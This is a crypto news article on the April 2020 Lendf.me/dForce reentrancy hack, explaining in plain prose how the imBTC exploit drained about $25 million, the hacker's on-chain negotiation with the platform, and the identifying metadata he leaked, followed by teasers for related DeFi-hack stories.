DForce Hacker Attempts to Negotiate After Allegedly Leaking His Identity

Published at: April 20, 2020

The world of decentralized finance (DeFi) suffered yet another incident on April 19 as Chinese lending platform Lendf.me, part of the dForce network, was drained of almost all of its funds. 

The hack is shaping up to be different from others, as the hacker seems to be negotiating with the founders of the protocol.

As reported by Cointelegraph yesterday, the attack occurred at 8:45 AM Chinese time on April 19, which corresponds to 8:45 PM Eastern time on April 18. The attacker leveraged a well-known vulnerability in the expanded ERC-777 token standard called reentrancy attack.

How did the hack work?

The hacker used the imBTC token as the Trojan horse of the attack. It is one of many Ethereum (ETH) wrappers for Bitcoin (BTC), which was written according to ERC-777 specification. This is considered a more advanced but also more vulnerable version of the common ERC-20 standard — especially when used in a DeFi context.

The hack exploited this by combining it with a crucial flaw in Lendf.me’s contracts and how they updated the user’s balance.

As an analyst going by the pseudonym of Frank Topbottom explained on Twitter, the hacker executed many iterations of a simple attack.

In every single transaction, the hacker deposited imBTC on the Lendf.me platform, which was registered on his account’s balance. A second deposit from the same transaction would add a minuscule amount of imBTC, which would allow using a “reentrancy” to withdraw the previously deposited tokens.

Crucially, the contract failed to update the hacker’s balance when withdrawing money. He was thus free to deposit the BTC again, doubling his balance each time. 

Eventually, the hacker siphoned almost the entirety of the imBTC present on the platform, amounting to some 291 imBTC ($2 million), according to the analyst. 

He then continued to perform the same attack, which at this point simply inflated his balance until its value covered the entirety of the funds held by the protocol.

Finally, he used the fake balance as collateral to borrow almost every single token available on the Lendf.me platform, carrying off about $25 million in various cryptocurrencies and stablecoins. 

The hacker already got partially busted

Shortly after the attack, an interesting exchange of on-chain messages occurred.

The hacker sent three transactions of PAX tokens summing up to $250,000 to 1inch.exchange, ParaSwap and an account identified as “Lendf.me admin.” This is most likely a symbolic gesture, as pax means “peace” in Latin.

Lendf.me replied with an email address to contact and then signaled that it had responded to the hacker’s inquiry. Later he returned Huobi-issued assets to Lendf.me, worth about $2.6 million.

Lendf.me finally sent a message with a mildly threatening tone, saying “Contact us, for your better future.”

Sergej Kunz, the CEO of 1inch.exchange — a decentralized exchange aggregator that the hacker used to exchange some of the funds — explained to Cointelegraph that the cybercriminal leaked important metadata about himself by directly using its web-based content delivery network, instead of the IPFS-based frontend.

Specifically, all three exchange requests came from a single Chinese IP address, which suggests that the hacker did not use a decentralized network like Tor. Kunz theorized that this is a VPN or a proxy server, which may be liable to subpoenas. 

The hacker is also known to have been using a Mac, revealing his screen’s resolution and system language, which was set to “en-us.”

It is worth noting that this data is trivial to obfuscate, but the high amount of uncommon details in this metadata suggested to 1inch that it was simply an oversight. He concluded:

“He seems to be a good programmer, but an inexperienced hacker.”

As police investigations are already underway, according to Kunz, it appears likely that the hacker will be forced to return the money in hopes of lenient treatment.

Tags
Related Posts
Poly Network hacker returns nearly all funds, refuses $500K white hat bounty
The hacker behind a $610 million attack on the cross-chain decentralized finance (DeFi) protocol Poly Network has returned almost all of the stolen funds amid the project saying their actions constituted “white hat behavior.” According to a Thursday update on the attack from Poly Network, all of the $610 million in funds taken in an exploit that used "a vulnerability between contract calls” have now been transferred to a multisig wallet controlled by the project and the hacker. The only remaining tokens are the roughly $33 million in Tether (USDT), which were frozen immediately following news of the attack. The …
Business / Aug. 12, 2021
DeFi surpasses $7B in locked funds, but just six projects hold 90% of capital
The total value of capital locked in decentralized finance protocols has increased 271% in less than two months to surpass $7 billion for the first time, according to DeFi Pulse. If the current rate of growth continues, DeFi will be worth more than $27 billion by the end of 2020. Aave currently comprises the largest DeFi project, with $1.51 billion locked, followed by MakerDAO with $1.42 billion, Curve Finance with $1.15 billion, yEarn Finance with $845 million, Synthetic with $851 million and Compound representing $797 million. Aave recently emerged as the top DeFi project after receiving an Electronic Money Institution …
Business / Aug. 26, 2020
The aftermath of Axie Infinity’s $650M Ronin Bridge hack
In late March, Ronin, an Ethereum sidechain built for the popular play-to-earn nonfungible token game Axie Infinity, was hacked for over 173,600 Ether (ETH) and 25.5 million USD Coin (USDC) for a combined value of over $600 million. The breach on the Ronin bridge was confirmed by Sky Mavis, the developers behind the popular play-to-earn (P2E) game: There has been a security breach on the Ronin Network.https://t.co/ktAp9w5qpP — Ronin (@Ronin_Network) March 29, 2022 The official report from the company noted that the hackers managed to get access to private keys to validator nodes resulting in the compromise of five validator …
Blockchain / April 12, 2022
Binance and Huobi freeze $1.4M in crypto linked to North Korean hackers
Cryptocurrency exchanges Binance and Huobi have again frozen accounts linked to the $100 million Harmony Horizon bridge attack on Jun. 24, 2022. Around $1.4 million worth of crypto frozen by the trading platforms came from accounts linked to the notorious Lazarus Group operating out of North Korea. The investigation was carried out by blockchain analytics firm Elliptic, according to a report shared by the firm on Feb. 14. However, the firm didn’t state what coins or tokens were frozen. Exchanges @binance and @HuobiGlobal today froze accounts containing $1.4 million stolen by North Korea’s Lazarus Group. This was made possible thanks …
Blockchain / Feb. 15, 2023
Top 7 cybersecurity jobs in high demand
In today’s digital age, cybersecurity has become a critical aspect of almost every business. Cyber threats are increasing daily, and businesses must take proactive measures to protect their networks and data. As a result, the demand for cybersecurity professionals has skyrocketed. Little Friday humour #meme #cybersecurity @hackurityio pic.twitter.com/MArEpCh03k — Harold De Vries (@devries_harold) February 17, 2023 In this article, we will discuss the top seven cybersecurity jobs that are in high demand. Cybersecurity analyst A cybersecurity analyst is responsible for identifying and mitigating cyber threats to an organization’s network and data. They examine system logs and network traffic to find …
Technology / Feb. 26, 2023